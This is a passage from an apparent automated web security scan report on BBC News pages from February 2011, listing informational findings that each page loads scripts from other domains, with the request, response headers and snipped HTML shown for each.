<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.16. http://www.bbc.co.uk/news/science-environment-12412662

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/science-environment-12412662

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/science-environment-12412662 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:50 GMT
Keep-Alive: timeout=10, max=754
Expires: Sat, 12 Feb 2011 02:02:50 GMT
Connection: close
Set-Cookie: BBC-UID=347dd5b5ce2a340ae7f18f05e125b582721989735070e1da843b3ad564517cdc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:50 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=347dd5b5ce2a340ae7f18f05e125b582721989735070e1da843b3ad564517cdc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:50 GMT; path=/; domain=bbc.co.uk;
Content-Length: 63587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.17. http://www.bbc.co.uk/news/science-environment-12417858

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/science-environment-12417858

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/science-environment-12417858 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:51 GMT
Keep-Alive: timeout=10, max=798
Expires: Sat, 12 Feb 2011 02:02:51 GMT
Connection: close
Set-Cookie: BBC-UID=948d15f55e4af4cbc9506d9791a9dbd248e5cac4c020a1c93b8b637f88c4864c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:51 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=948d15f55e4af4cbc9506d9791a9dbd248e5cac4c020a1c93b8b637f88c4864c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:51 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58835

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.18. http://www.bbc.co.uk/news/science-environment-12424620

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/science-environment-12424620

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/science-environment-12424620 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:51 GMT
Keep-Alive: timeout=10, max=742
Expires: Sat, 12 Feb 2011 02:02:51 GMT
Connection: close
Set-Cookie: BBC-UID=24bd35052e5ae45b586d3412f10916bd75e7eb6aa0400263d7fd6a702573da8e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:51 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=24bd35052e5ae45b586d3412f10916bd75e7eb6aa0400263d7fd6a702573da8e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:51 GMT; path=/; domain=bbc.co.uk;
Content-Length: 46470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.19. http://www.bbc.co.uk/news/technology-12419672

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/technology-12419672

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/technology-12419672 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:52 GMT
Keep-Alive: timeout=10, max=789
Expires: Sat, 12 Feb 2011 02:02:52 GMT
Connection: close
Set-Cookie: BBC-UID=f4adc5b54e0a54dc0a5670a631741a202a9d9cb860401179bb3b222a563c34760Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:52 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=f4adc5b54e0a54dc0a5670a631741a202a9d9cb860401179bb3b222a563c34760Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:52 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.20. http://www.bbc.co.uk/news/technology-12429808

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/technology-12429808

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/technology-12429808 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:53 GMT
Keep-Alive: timeout=10, max=773
Expires: Sat, 12 Feb 2011 02:02:53 GMT
Connection: close
Set-Cookie: BBC-UID=94dd95e52e1a548dcac1b16be17c735c87363dcf70a0a1c92b6be322574de9ce0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:53 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=94dd95e52e1a548dcac1b16be17c735c87363dcf70a0a1c92b6be322574de9ce0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:53 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55089

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.21. http://www.bbc.co.uk/news/uk-12427839

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-12427839

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/uk-12427839 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:54 GMT
Keep-Alive: timeout=10, max=800
Expires: Sat, 12 Feb 2011 02:02:54 GMT
Connection: close
Set-Cookie: BBC-UID=04cd85857e9a64ee181d5551d121862c55bfe53e20309273c7ad8af045b36a8e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:54 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=04cd85857e9a64ee181d5551d121862c55bfe53e20309273c7ad8af045b36a8e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:54 GMT; path=/; domain=bbc.co.uk;
Content-Length: 67506

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.22. http://www.bbc.co.uk/news/uk-12435618

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-12435618

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/uk-12435618 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:54 GMT
Keep-Alive: timeout=10, max=762
Expires: Sat, 12 Feb 2011 02:02:54 GMT
Connection: close
Set-Cookie: BBC-UID=24fdb5356ecaf4debb8ae1bd313b7eabe554f7b730b0013a544b6aa4e09c26720Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:54 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=24fdb5356ecaf4debb8ae1bd313b7eabe554f7b730b0013a544b6aa4e09c26720Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:54 GMT; path=/; domain=bbc.co.uk;
Content-Length: 72496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.23. http://www.bbc.co.uk/news/uk-12437244

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-12437244

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/uk-12437244 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:55 GMT
Keep-Alive: timeout=10, max=768
Expires: Sat, 12 Feb 2011 02:02:55 GMT
Connection: close
Set-Cookie: BBC-UID=946d05859e4a442ff900af849105a5df1ca7581e40e0a1898babf30f78e4569c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:55 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=946d05859e4a442ff900af849105a5df1ca7581e40e0a1898babf30f78e4569c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:55 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55203

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.24. http://www.bbc.co.uk/news/uk-england-london-12438040

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-england-london-12438040

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/uk-england-london-12438040 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:56 GMT
Keep-Alive: timeout=10, max=793
Expires: Sat, 12 Feb 2011 02:02:56 GMT
Connection: close
Set-Cookie: BBC-UID=448dd5d5beda6590fa6279dd51620c560b0a78bb60f001e9db9bf3bea83da36a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:56 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=448dd5d5beda6590fa6279dd51620c560b0a78bb60f001e9db9bf3bea83da36a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:56 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56973

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.25. http://www.bbc.co.uk/news/uk-northern-ireland-12427112

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-northern-ireland-12427112

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/uk-northern-ireland-12427112 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:57 GMT
Keep-Alive: timeout=10, max=759
Expires: Sat, 12 Feb 2011 02:02:57 GMT
Connection: close
Set-Cookie: BBC-UID=148de5054e8ab551ab4a8f5951ed1f0516485c23d0808179ab3bc2adb49ff13e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:57 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=148de5054e8ab551ab4a8f5951ed1f0516485c23d0808179ab3bc2adb49ff13e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:57 GMT; path=/; domain=bbc.co.uk;
Content-Length: 54831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
